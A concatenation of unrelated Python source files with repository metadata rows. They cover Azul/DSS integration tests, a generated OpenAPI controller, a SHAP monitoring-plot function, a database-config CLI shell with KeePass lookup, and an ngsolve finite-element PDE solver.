# The same seed should give same random order so we need to have a
# deterministic order in the input list.
bundle_fqids = sorted(bundle_fqids)
random_.shuffle(bundle_fqids)
# Pick bundles off of the randomly ordered input until we have the
# desired number of bundles with project metadata.
filtered_bundle_fqids = []
for bundle_fqid in bundle_fqids:
if len(filtered_bundle_fqids) < max_bundles:
if self.azul_client.bundle_has_project_json(catalog, bundle_fqid):
filtered_bundle_fqids.append(bundle_fqid)
else:
break
return filtered_bundle_fqids
def _assert_catalog_complete(self,
catalog: CatalogName,
entity_type: str,
bundle_fqids: AbstractSet[BundleFQID]) -> None:
with self.subTest('catalog_complete', catalog=catalog):
expected_fqids = set(self.azul_client.filter_obsolete_bundle_versions(bundle_fqids))
obsolete_fqids = bundle_fqids - expected_fqids
if obsolete_fqids:
log.debug('Ignoring obsolete bundle versions %r', obsolete_fqids)
num_bundles = len(expected_fqids)
timeout = 600
indexed_fqids = set()
log.debug('Expecting bundles %s ', sorted(expected_fqids))
retries = 0
deadline = time.time() + timeout
while True:
hits = self._get_entities(catalog, entity_type)
indexed_fqids.update(
BundleFQID(bundle['bundleUuid'], bundle['bundleVersion'])
for hit in hits
for bundle in hit.get('bundles', [])
)
log.info('Detected %i of %i bundles in %i hits for entity type %s on try #%i.',
len(indexed_fqids), num_bundles, len(hits), entity_type, retries)
if len(indexed_fqids) == num_bundles:
log.info('Found the expected %i bundles.', num_bundles)
break
elif len(indexed_fqids) > num_bundles:
log.error('Found %i bundles, more than the expected %i.',
len(indexed_fqids), num_bundles)
break
elif time.time() > deadline:
log.error('Only found %i of %i bundles in under %i seconds.',
len(indexed_fqids), num_bundles, timeout)
break
else:
retries += 1
time.sleep(5)
self.assertSetEqual(indexed_fqids, expected_fqids)
entity_types = ['files', 'projects', 'samples', 'bundles']
def _assert_catalog_empty(self, catalog: CatalogName):
for entity_type in self.entity_types:
with self.subTest('catalog_empty',
catalog=catalog,
entity_type=entity_type):
hits = self._get_entities(catalog, entity_type)
self.assertEqual([], [hit['entryId'] for hit in hits])
def _get_entities(self, catalog: CatalogName, entity_type):
entities = []
size = 100
params = dict(catalog=catalog,
size=str(size))
url = furl(url=config.service_endpoint(),
path=('index', entity_type),
query_params=params
).url
while True:
response = self._get_url(url)
body = response.json()
hits = body['hits']
entities.extend(hits)
url = body['pagination']['next']
if url is None:
break
return entities
def _assert_indices_exist(self, catalog: CatalogName):
"""
Aside from checking that all indices exist this method also asserts
that we can instantiate a local ES client pointing at a real, remote
ES domain.
"""
es_client = ESClientFactory.get()
service = IndexService()
for index_name in service.index_names(catalog):
self.assertTrue(es_client.indices.exists(index_name))
class AzulClientIntegrationTest(IntegrationTestCase):
def test_azul_client_error_handling(self):
invalid_notification = {}
notifications = [invalid_notification]
self.assertRaises(AzulClientNotificationError,
self.azul_client.index,
first(config.integration_test_catalogs),
notifications)
class PortalRegistrationIntegrationTest(IntegrationTestCase):
# FIXME: Re-enable once overloading of S3 API is resolved
# https://github.com/DataBiosphere/azul/issues/2399
@unittest.skipIf(True or config.is_main_deployment(), 'Test would pollute portal DB')
def test_concurrent_portal_db_crud(self):
"""
Use multithreading to simulate multiple users simultaneously modifying
the portals database.
"""
# Currently takes about 50 seconds and creates a 25 kb db file.
n_threads = 10
n_tasks = n_threads * 10
n_ops = 5
portal_service = PortalService()
entry_format = 'task={};op={}'
def run(thread_count):
for op_count in range(n_ops):
mock_entry = cast(JSON, {
"portal_id": "foo",
"integrations": [
{
"integration_id": "bar",
"entity_type": "project",
"integration_type": "get",
"entity_ids": ["baz"]
}
],
"mock-count": entry_format.format(thread_count, op_count)
})
portal_service._crud(lambda db: list(db) + [mock_entry])
old_db = portal_service.read()
with ThreadPoolExecutor(max_workers=n_threads) as executor:
futures = [executor.submit(run, i) for i in range(n_tasks)]
self.assertTrue(all(f.result() is None for f in futures))
new_db = portal_service.read()
old_entries = [portal for portal in new_db if 'mock-count' not in portal]
self.assertEqual(old_entries, old_db)
mock_counts = [portal['mock-count'] for portal in new_db if 'mock-count' in portal]
self.assertEqual(len(mock_counts), len(set(mock_counts)))
self.assertEqual(set(mock_counts), {entry_format.format(i, j) for i in range(n_tasks) for j in range(n_ops)})
# Reset to pre-test state.
portal_service.overwrite(old_db)
class OpenAPIIntegrationTest(AzulTestCase):
def test_openapi(self):
service = config.service_endpoint()
response = requests.get(service + '/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers['content-type'], 'text/html')
self.assertGreater(len(response.content), 0)
# validate OpenAPI spec
response = requests.get(service + '/openapi')
response.raise_for_status()
spec = response.json()
validate_spec(spec)
class DSSIntegrationTest(AzulTestCase):
def test_patched_dss_client(self):
query = {
"query": {
"bool": {
"must_not": [
{
"term": {
"admin_deleted": True
}
}
],
"must": [
{
"exists": {
"field": "files.project_json"
}
},
{
"range": {
"manifest.version": {
"gte": "2019-04-01"
}
}
}
]
}
}
}
self.maxDiff = None
for direct in {config.dss_direct_access, False}:
for replica in 'aws', 'gcp':
if direct:
with self._failing_s3_get_object():
dss_client = azul.dss.direct_access_client()
self._test_dss_client(direct, query, dss_client, replica, fallback=True)
dss_client = azul.dss.direct_access_client()
self._test_dss_client(direct, query, dss_client, replica, fallback=False)
else:
dss_client = azul.dss.client()
self._test_dss_client(direct, query, dss_client, replica, fallback=False)
class SpecialError(Exception):
pass
def _failing_s3_get_object(self):
def make_mock(**kwargs):
original = kwargs['spec']
def mock_boto3_client(service, *args, **kwargs):
if service == 's3':
mock_s3 = mock.MagicMock()
mock_s3.get_object.side_effect = self.SpecialError()
return mock_s3
else:
return original(service, *args, **kwargs)
return mock_boto3_client
return mock.patch('azul.deployment.aws.client', spec=True, new_callable=make_mock)
def _test_dss_client(self, direct: bool, query: JSON, dss_client: DSSClient, replica: str, fallback: bool):
with self.subTest(direct=direct, replica=replica, fallback=fallback):
response = dss_client.post_search(es_query=query, replica=replica, per_page=10)
bundle_uuid, _, bundle_version = response['results'][0]['bundle_fqid'].partition('.')
with mock.patch('azul.dss.logger') as captured_log:
_, manifest, metadata = download_bundle_metadata(client=dss_client,
replica=replica,
uuid=bundle_uuid,
version=bundle_version,
num_workers=config.num_dss_workers)
log.info('Captured log calls: %r', captured_log.mock_calls)
self.assertGreater(len(metadata), 0)
self.assertGreater(set(f['name'] for f in manifest), set(metadata.keys()))
for f in manifest:
self.assertIn('s3_etag', f)
# Extract the log method name and the first three words of log
# message logged. Note that the PyCharm debugger will call
# certain dunder methods on the variable, leading to failed
# assertions.
actual = [(m, ' '.join(re.split(r'[\s,]', a[0])[:3])) for m, a, k in captured_log.mock_calls]
if direct:
if replica == 'aws':
if fallback:
expected = [
('debug', 'Loading bundle %s'),
('debug', 'Loading object %s'),
('warning', 'Error accessing bundle'),
('warning', 'Failed getting bundle')
] + [
('debug', 'Loading file %s'),
('debug', 'Loading object %s'),
('warning', 'Error accessing file'),
('warning', 'Failed getting file')
] * len(metadata)
else:
expected = [
('debug', 'Loading bundle %s'),
('debug', 'Loading object %s')
] + [
('debug', 'Loading file %s'),
('debug', 'Loading object %s'), # file
('debug', 'Loading object %s') # blob
] * len(metadata)
else:
# On `gcp` the precondition check fails right away, preventing any attempts of direct access
expected = [
('warning', 'Failed getting bundle')
] + [
('warning', 'Failed getting file')
] * len(metadata)
else:
expected = []
self.assertSequenceEqual(sorted(expected), sorted(actual))
def test_get_file_fail(self):
for direct in {config.dss_direct_access, False}:
with self.subTest(direct=direct):
dss_client = azul.dss.direct_access_client() if direct else azul.dss.client()
with self.assertRaises(SwaggerAPIException) as e:
dss_client.get_file(uuid='acafefed-beef-4bad-babe-feedfa11afe1',
version='2018-11-19T232756.056947Z',
replica='aws')
self.assertEqual(e.exception.reason, 'not_found')
def test_mini_dss_failures(self):
uuid = 'acafefed-beef-4bad-babe-feedfa11afe1'
version = '2018-11-19T232756.056947Z'
with self._failing_s3_get_object():
mini_dss = azul.dss.MiniDSS(config.dss_endpoint)
with self.assertRaises(self.SpecialError):
mini_dss._get_file_object(uuid, version)
with self.assertRaises(KeyError):
mini_dss._get_blob_key({})
with self.assertRaises(self.SpecialError):
mini_dss._get_blob('/blobs/foo', {'content-type': 'application/json'})
with self.assertRaises(self.SpecialError):
mini_dss.get_bundle(uuid, version, 'aws')
with self.assertRaises(self.SpecialError):
mini_dss.get_file(uuid, version, 'aws')
with self.assertRaises(self.SpecialError):
mini_dss.get_native_file_url(uuid, version, 'aws')
class AzulChaliceLocalIntegrationTest(AzulTestCase):
url = furl(scheme='http', host='127.0.0.1', port=8000)
server = None
server_thread = None
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
app_module = load_app_module('service')
app_dir = os.path.dirname(app_module.__file__)
factory = chalice.cli.factory.CLIFactory(app_dir)
config = factory.create_config_obj()
cls.server = factory.create_local_server(app_obj=app_module.app,
config=config,
host=cls.url.host,
port=cls.url.port)
cls.server_thread = threading.Thread(target=cls.server.serve_forever)
cls.server_thread.start()
@classmethod
def tearDownClass(cls) -> None:
cls.server.shutdown()
cls.server_thread.join()
super().tearDownClass()
def test_local_chalice_health_endpoint(self):
url = self.url.copy().set(path='health').url
response = requests.get(url)
self.assertEqual(200, response.status_code)
catalog = first(config.integration_test_catalogs.keys())
def test_local_chalice_index_endpoints(self):
url = self.url.copy().set(path='index/files',
query=dict(catalog=self.catalog)).url
response = requests.get(url)
self.assertEqual(200, response.status_code)
def test_local_filtered_index_endpoints(self):
filters = {'genusSpecies': {'is': ['Homo sapiens']}}
url = self.url.copy().set(path='index/files',
query=dict(filters=json.dumps(filters),
catalog=self.catalog)).url
response = requests.get(url)
self.assertEqual(200, response.status_code)
| 40.231386 | 117 | 0.553442 | 33,210 | 0.945561 | 402 | 0.011446 | 5,251 | 0.149507 | 0 | 0 | 5,277 | 0.150248 |
6a1f1b69ee306e65ab06cc8411c8b814a7455225 | 4,886 | py | Python | server/openapi_server/controllers/data_transformation_controller.py | mintproject/MINT-ModelCatalogIngestionAPI | 026d3495483a3e48ea3c1364d0dda09beeea69e4 | [
"Apache-2.0"
] | 2 | 2019-05-30T21:33:43.000Z | 2019-09-27T21:04:38.000Z | server/openapi_server/controllers/data_transformation_controller.py | mintproject/model-catalog-api | 2ad7016691891497bba37afe8ceb0fea8fe769e5 | [
"Apache-2.0"
] | 82 | 2019-10-08T16:35:34.000Z | 2022-03-15T18:25:27.000Z | server/openapi_server/controllers/data_transformation_controller.py | mintproject/model-catalog-api | 2ad7016691891497bba37afe8ceb0fea8fe769e5 | [
"Apache-2.0"
] | null | null | null | import connexion
import six
from openapi_server import query_manager
from openapi_server.utils.vars import DATATRANSFORMATION_TYPE_NAME, DATATRANSFORMATION_TYPE_URI
from openapi_server.models.data_transformation import DataTransformation # noqa: E501
from openapi_server import util
def custom_datasetspecifications_id_datatransformations_get(id, custom_query_name=None, username=None): # noqa: E501
"""Gets a list of data transformations related a dataset
Gets a list of data transformations related a dataset # noqa: E501
:param id: The ID of the dataspecification
:type id: str
:param custom_query_name: Name of the custom query
:type custom_query_name: str
:param username: Username to query
:type username: str
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(id=id,
custom_query_name=custom_query_name,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_get(username=None, label=None, page=None, per_page=None): # noqa: E501
"""List all instances of DataTransformation
Gets a list of all instances of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param username: Name of the user graph to query
:type username: str
:param label: Filter by label
:type label: str
:param page: Page number
:type page: int
:param per_page: Items per page
:type per_page: int
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(
username=username,
label=label,
page=page,
per_page=per_page,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_delete(id, user=None): # noqa: E501
"""Delete an existing DataTransformation
Delete an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:rtype: None
"""
return query_manager.delete_resource(id=id,
user=user,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_get(id, username=None): # noqa: E501
"""Get a single DataTransformation by its id
Gets the details of a given DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param username: Name of the user graph to query
:type username: str
:rtype: DataTransformation
"""
return query_manager.get_resource(id=id,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_put(id, user=None, data_transformation=None): # noqa: E501
"""Update an existing DataTransformation
Updates an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:param data_transformation: An old DataTransformationto be updated
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.put_resource(id=id,
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_post(user=None, data_transformation=None): # noqa: E501
"""Create one DataTransformation
Create a new instance of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param user: Username
:type user: str
:param data_transformation: Information about the DataTransformationto be created
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.post_resource(
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
| 33.465753 | 134 | 0.731068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,486 | 0.508801 |
6a1f4e62deeca6901732e02e6f44f1571b8f71c9 | 2,634 | py | Python | shap/plots/monitoring.py | NunoEdgarGFlowHub/shap | 6992883fb3470163fcbe2bfacae0bd5f724ed1f8 | [
"MIT"
] | 8 | 2019-09-23T16:20:40.000Z | 2021-10-09T20:26:20.000Z | shap/plots/monitoring.py | NunoEdgarGFlowHub/shap | 6992883fb3470163fcbe2bfacae0bd5f724ed1f8 | [
"MIT"
] | 1 | 2019-02-22T10:16:13.000Z | 2019-02-22T10:16:13.000Z | shap/plots/monitoring.py | NunoEdgarGFlowHub/shap | 6992883fb3470163fcbe2bfacae0bd5f724ed1f8 | [
"MIT"
] | 4 | 2019-06-28T12:50:51.000Z | 2021-07-02T07:42:18.000Z | import numpy as np
import scipy
import warnings
try:
import matplotlib.pyplot as pl
import matplotlib
except ImportError:
warnings.warn("matplotlib could not be loaded!")
pass
from . import labels
from . import colors
def truncate_text(text, max_len):
if len(text) > max_len:
return text[:int(max_len/2)-2] + "..." + text[-int(max_len/2)+1:]
else:
return text
def monitoring_plot(ind, shap_values, features, feature_names=None):
""" Create a SHAP monitoring plot.
(Note this function is preliminary and subject to change!!)
A SHAP monitoring plot is meant to display the behavior of a model
over time. Often the shap_values given to this plot explain the loss
of a model, so changes in a feature's impact on the model's loss over
time can help in monitoring the model's performance.
Parameters
----------
ind : int
Index of the feature to plot.
shap_values : numpy.array
Matrix of SHAP values (# samples x # features)
features : numpy.array or pandas.DataFrame
Matrix of feature values (# samples x # features)
feature_names : list
Names of the features (length # features)
"""
if str(type(features)).endswith("'pandas.core.frame.DataFrame'>"):
if feature_names is None:
feature_names = features.columns
features = features.values
pl.figure(figsize=(10,3))
ys = shap_values[:,ind]
xs = np.arange(len(ys))#np.linspace(0, 12*2, len(ys))
pvals = []
inc = 50
for i in range(inc, len(ys)-inc, inc):
#stat, pval = scipy.stats.mannwhitneyu(v[:i], v[i:], alternative="two-sided")
stat, pval = scipy.stats.ttest_ind(ys[:i], ys[i:])
pvals.append(pval)
min_pval = np.min(pvals)
min_pval_ind = np.argmin(pvals)*inc + inc
if min_pval < 0.05 / shap_values.shape[1]:
pl.axvline(min_pval_ind, linestyle="dashed", color="#666666", alpha=0.2)
pl.scatter(xs, ys, s=10, c=features[:,ind], cmap=colors.red_blue)
pl.xlabel("Sample index")
pl.ylabel(truncate_text(feature_names[ind], 30) + "\nSHAP value", size=13)
pl.gca().xaxis.set_ticks_position('bottom')
pl.gca().yaxis.set_ticks_position('left')
pl.gca().spines['right'].set_visible(False)
pl.gca().spines['top'].set_visible(False)
cb = pl.colorbar()
cb.outline.set_visible(False)
bbox = cb.ax.get_window_extent().transformed(pl.gcf().dpi_scale_trans.inverted())
cb.ax.set_aspect((bbox.height - 0.7) * 20)
cb.set_label(truncate_text(feature_names[ind], 30), size=13)
pl.show() | 33.769231 | 85 | 0.648823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 985 | 0.373956 |
6a1f7efcf406b9bcc9bc35cc271b47eed9db309f | 7,998 | py | Python | mod_core.py | nokia-wroclaw/innovativeproject-dbshepherd | f82f3b36caaf9fcd6d28076051cb92458ba2edd3 | [
"MIT"
] | null | null | null | mod_core.py | nokia-wroclaw/innovativeproject-dbshepherd | f82f3b36caaf9fcd6d28076051cb92458ba2edd3 | [
"MIT"
] | null | null | null | mod_core.py | nokia-wroclaw/innovativeproject-dbshepherd | f82f3b36caaf9fcd6d28076051cb92458ba2edd3 | [
"MIT"
] | 1 | 2020-02-05T20:02:15.000Z | 2020-02-05T20:02:15.000Z | import re
import os
import cmd
import sys
import common
from getpass import getpass
from kp import KeePassError, get_password
from configmanager import ConfigManager, ConfigManagerError
common.init()
class ParseArgsException(Exception):
def __init__(self, msg):
self.msg = msg
class ModuleCore(cmd.Cmd):
def __init__(self, module = ''):
cmd.Cmd.__init__(self)
self.master = None
if module == '#':
self.prompt_sign = '#>'
elif module != '':
self.prompt_sign = '[' + module + ']>'
else:
self.prompt_sign = '->'
#defaults
self.ruler = '-'
#Completions
self.directories = []
self.file_server_database = []
self.file_server = []
self.do_cd('.')
configs = ConfigManager().get_config_list()
for conf in configs:
self.file_server_database.append(conf)
self.file_server.append(conf)
for srv in ConfigManager('config/' + conf + '.yaml').get_all():
self.file_server_database.append(conf + '.' + srv)
self.file_server.append(conf + '.' + srv)
for db in ConfigManager('config/' + conf + '.yaml').get(srv)['databases']:
self.file_server_database.append(conf + '.' + srv + '.' + db)
def precmd(self, line):
if not sys.stdin.isatty():
print(line)
return line
def postcmd(self, stop, line):
if not sys.stdin.isatty():
print("")
return stop
def parse_args(self, string="", n=0, m=0):
list = re.findall('"+.*"+|[a-zA-Z0-9!@#$%^&*()_+-,./<>?]+', string)
arg_counter = len(list);
if (arg_counter >= n and arg_counter <= m) or (arg_counter == n and m == 0) or n == 0:
r_list = []
for l in list:
r_list.append(l.replace('"', ''))
return (r_list, len(list))
else:
raise ParseArgsException("Incorrect number of arguments")
# wykonuje daną funkcję (callback) na wszystkich bazach
def exec_on_config(self, callback, args, values, view = ''): # link - file.server.base
if values == '': # wykonaj na wszystkich plikach
files = ConfigManager().get_config_list() # pobierz listę plików konfiguracyjnych
# wyświetl na czym będziesz wykonywać
print("Exec on:")
for file in files:
print('+-',file)
ans = input("Are you sure? [NO/yes/info]: ")
if ans == "yes": #wykonaj callback
for file in files:
if view == 'tree': print('+-', file)
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
if view == 'tree': print("| +-", srv)
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("| | +-", db)
if view == 'list': print('[', file, '->', srv, '->', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
elif ans == "info": #podaj tylko informację na czym callback zostałby wykonany
for file in files:
print('+-', file)
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
print('| +-', srv)
databases = servers[srv]["databases"]
for db in databases:
print('| | +-', db)
else: #jeżeli nie zdecydujemy się na wykonanie czegokolwiek
print("aborted")
else: # jeżeli specjalizujemy na czym chcemy wykonać
val = values.split('.') #rozdzielamy nazwę_pliku.serwera.bazy
params = len(val)
if params == 1: # jeżeli podano nazwę tylko pliku to wykonaj na wszystkich serwerach, bazach które są w nim zapisane
file = val[0]
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
if view == 'tree': print("+-", srv)
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("| +-", db)
if view == 'list': print('[', srv, '->', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
elif params == 2: # jeżeli podano nazwę pliku i serwer to wykonaj na wszystkich bazach na serwerze
file = val[0]
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
srv = val[1]
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("+-", db)
if view == 'list': print('[', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
elif params == 3: # podano nazwę pliku, serwer i nazwę bazy - wykonaj polecenie dokładnie na niej
try:
callback(val[0], val[1], val[2], *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
# zwraca skróconą ścieżkę do aktualnego katalogu - funkcja pomocnicza
def get_shortpath(self):
path = common.get_cdir()
separator = ''
if '\\' in path:
separator = '\\'
else:
separator = '/'
start = path.find(separator)
end = path.rfind(separator, 0, len(path)-1)
if start < end:
return (path[0:start+1] + '...' + path[end:])
else:
return (path)
# autouzupełnienia dla cmd polecenia cd
def complete_cd(self, text, line, begidx, endidx):
if not text:
completions = self.directories[:]
else:
completions = [f for f in self.directories if f.startswith(text)]
return completions
# polecenie cd - pozwala na przemieszczanie się po katalogach
def do_cd(self, args):
"Move to directory"
if args == '':
print(common.get_cdir())
else:
try:
common.chdir(args)
self.prompt = self.get_shortpath() + ' ' + self.prompt_sign
self.directories = []
for name in os.listdir(common.get_cdir()):
if os.path.isdir(os.path.join(common.get_cdir(), name)):
self.directories.append(name)
except FileNotFoundError as e:
print(e)
# wyświetla wszystkie pliki w lokalizacji
def do_ls(self, args):
"List directory"
for name in os.listdir(common.get_cdir()):
print(name)
# podaje pełną ścieżkę aktualnego katalogu
def do_pwd(self, args):
"Print path"
print(common.get_cdir())
# pozwala na decyzję czy chcemy wyświetlać warningi
def do_warn(self, args):
"""warn <on/off>"""
try:
(values, values_num) = self.parse_args(args, 0, 1)
if values_num == 1:
if values[0] == 'on':
print('Warnings on')
self.warn = True
elif values[0] == 'off':
print('Warnings off')
self.warn = False
else:
print('Incorrect argument.')
else:
if self.warn == True:
print('Status: on')
else:
print('Status: off')
except ParseArgsException as e:
print(e)
# ustawia masterpassword dla keepasa
def do_setMaster(self,args):
"Set master password"
if sys.stdin.isatty(): # jezeli jako shell
p = getpass('Enter Master Password: ')
else:
p = sys.stdin.readline().rstrip()
self.master = p
def do_exit(self, *args):
return True
def do_EOF(self, line):
return True
def emptyline(self):
return False
# Musimy wyłapać wszystko co możliwe, nie ma pliku, zly master itp. i zwrocic 1 wyjątek
def get_password(self, alias):
keepass_path = common.keepass_path
if self.master == None:
raise KeePassError("Master Password Not Set")
try:
return get_password(keepass_path, self.master, alias)
except KeePassError as e:
raise e
def connect_command_builder(self,connection, perm):
try:
command = connection["adress"] + "_" + connection["user"]+ "_" + \
self.get_password(connection["keepass"]) + "_" + str(connection["sshport"]) + "_" + str(connection["remoteport"]) + "_" + perm
except (KeyError, KeePassError) as e1:
try:
command = connection["adress"] + "_" + connection["user"]+ "_" + \
connection["passwd"] + "_" + str(connection["sshport"]) + "_" + str(connection["remoteport"]) + "_" + perm
return command
except KeyError as e2:
if isinstance(e1,KeePassError):
raise KeePassError("Unable to use Keepass(" + e1.value + ") or Password")
else:
raise KeePassError("Invalid connection in yaml file")
raise KeePassError(e1)
return command | 29.512915 | 132 | 0.635159 | 7,834 | 0.974257 | 0 | 0 | 0 | 0 | 0 | 0 | 2,123 | 0.264022 |
6a2025301420406c02ae8d4c4fc4c88641b66f90 | 7,702 | py | Python | code/testbed/pde1/FemPde1.py | nicolai-schwartze/Masterthesis | 7857af20c6b233901ab3cedc325bd64704111e16 | [
"MIT"
] | 1 | 2020-06-13T10:02:02.000Z | 2020-06-13T10:02:02.000Z | code/testbed/pde1/FemPde1.py | nicolai-schwartze/Masterthesis | 7857af20c6b233901ab3cedc325bd64704111e16 | [
"MIT"
] | null | null | null | code/testbed/pde1/FemPde1.py | nicolai-schwartze/Masterthesis | 7857af20c6b233901ab3cedc325bd64704111e16 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 13 14:57:32 2020
@author: Nicolai
"""
import sys
import os
importpath = os.path.dirname(os.path.realpath(__file__)) + "/../"
sys.path.append(importpath)
from FemPdeBase import FemPdeBase
import numpy as np
# import from ngsolve
import ngsolve as ngs
from netgen.geom2d import unit_square
import time
import psutil
import gc
class FemPde1(FemPdeBase):
"""
**Implementation of PDE1 of the testbed:**
.. math::
- \Delta u(\mathbf{x}) = -2^{40}y^{10}(1-y)^{10}[90x^8(1-x)^{10}
- 200x^9(1-x)^9 + 90x^{10}(1-x)^8]
-2^{40}x^{10}(1-x)^{10}[90y^8(1-y)^{10}
- 200y^9(1-y)^9 + 90y^{10}(1-y)^8]
\Omega: \mathbf{x} \in [0,1]
u(\mathbf{x})|_{\partial \Omega} = 0
**with the solution:**
.. math::
u(\mathbf{x}) = 2^{40}x^{10}(1-x)^{10}y^{10}(1-y)^{10}
Attributes
----------
max_nodf: int
the maximum number of degrees of freedom that can be created in the
adaptive mesh refinement, standard value is 50000
Methods
-------
solve()
solves the pde by calling ngsolve, provides: static condensation,
adaptive mesh refinement, parallelisation (where possible), sets the
internal variables for evaluating the exact solution and calculating
the distance between exact and approx solution
also sets execution time and memory consumption
Examples
--------
>>> import numpy as np
>>> fempde2 = FemPde2(True)
>>> pos = np.array([0.5, 0.5])
>>> fempde2.exact(pos)
>>> x -> numpy.ndarray with shape (2,)
_mesh -> ngs.comp.Mesh
_ngs_ex -> ngs.fem.CoefficientFunction
-> try to call solve() first
>>> fempde2.solve()
>>> fempde2.exact(pos)
1.0
>>> fempde2.approx(pos)
0.999998924259486
>>> fempde2.normL2()
5.853102150391562e-07
>>> fempde2.exec_time
3.830256175994873
>>> fempde2.mem_consumption
76705792
"""
def __init__(self, show_gui, max_ndof=50000):
super().__init__(show_gui)
# init protected
self._pde_string = "-laplacian(u(x)) = -(2^40*y^10*(1-y)^10*(90*x^8*(1-x)^10 - 200*x^9*(1-x)^9 + 90*x^10*(1-x)^8)) -(2^40*x^10*(1-x)^10*(90*y^8*(1-y)^10 - 200*y^9*(1-y)^9 + 90*y^10*(1-y)^8))"
self._ngs_ex = (2**(4*10))*(ngs.x**10)*((1-ngs.x)**10)*(ngs.y**10)*((1-ngs.y)**10)
# init public
self.max_ndof = max_ndof
def solve(self):
# disable garbage collector
# --------------------------------------------------------------------#
gc.disable()
while(gc.isenabled()):
time.sleep(0.1)
# --------------------------------------------------------------------#
# measure how much memory is used until here
process = psutil.Process()
memstart = process.memory_info().vms
# starts timer
tstart = time.time()
if self.show_gui:
import netgen.gui
# create mesh with initial size 0.1
self._mesh = ngs.Mesh(unit_square.GenerateMesh(maxh=0.1))
#create finite element space
self._fes = ngs.H1(self._mesh, order=2, dirichlet=".*", autoupdate=True)
# test and trail function
u = self._fes.TrialFunction()
v = self._fes.TestFunction()
# create bilinear form and enable static condensation
self._a = ngs.BilinearForm(self._fes, condense=True)
self._a += ngs.grad(u)*ngs.grad(v)*ngs.dx
# creat linear functional and apply RHS
self._f = ngs.LinearForm(self._fes)
self._f += ( \
-(2**40*ngs.y**10*(1-ngs.y)**10*(90*ngs.x**8*(1-ngs.x)**10 - 200*ngs.x**9*(1-ngs.x)**9 + 90*ngs.x**10*(1-ngs.x)**8)) \
-(2**40*ngs.x**10*(1-ngs.x)**10*(90*ngs.y**8*(1-ngs.y)**10 - 200*ngs.y**9*(1-ngs.y)**9 + 90*ngs.y**10*(1-ngs.y)**8)) )*v*ngs.dx
# preconditioner: multigrid - what prerequisits must the problem have?
self._c = ngs.Preconditioner(self._a,"multigrid")
# create grid function that holds the solution and set the boundary to 0
self._gfu = ngs.GridFunction(self._fes, autoupdate=True) # solution
self._g = 0.0
self._gfu.Set(self._g, definedon=self._mesh.Boundaries(".*"))
# draw grid function in gui
if self.show_gui:
ngs.Draw(self._gfu)
# create Hcurl space for flux calculation and estimate error
self._space_flux = ngs.HDiv(self._mesh, order=2, autoupdate=True)
self._gf_flux = ngs.GridFunction(self._space_flux, "flux", autoupdate=True)
# TaskManager starts threads that (standard thread nr is numer of cores)
with ngs.TaskManager():
# this is the adaptive loop
while self._fes.ndof < self.max_ndof:
self._solveStep()
self._estimateError()
self._mesh.Refine()
# since the adaptive loop stopped with a mesh refinement, the gfu must be
# calculated one last time
self._solveStep()
if self.show_gui:
ngs.Draw(self._gfu)
# set measured exectution time
self._exec_time = time.time() - tstart
# set measured used memory
memstop = process.memory_info().vms - memstart
self._mem_consumption = memstop
# enable garbage collector
# --------------------------------------------------------------------#
gc.enable()
gc.collect()
# --------------------------------------------------------------------#
if __name__ == "__main__":
fempde1 = FemPde1(True)
print(fempde1.pde_string)
try:
fempde1.exact(np.array([0.5,0.5]))
except:
print("Î error message above")
try:
fempde1.approx(np.array([0.5,0.5]))
except:
print("Î error message above")
fempde1.solve()
print("-------------------------------------")
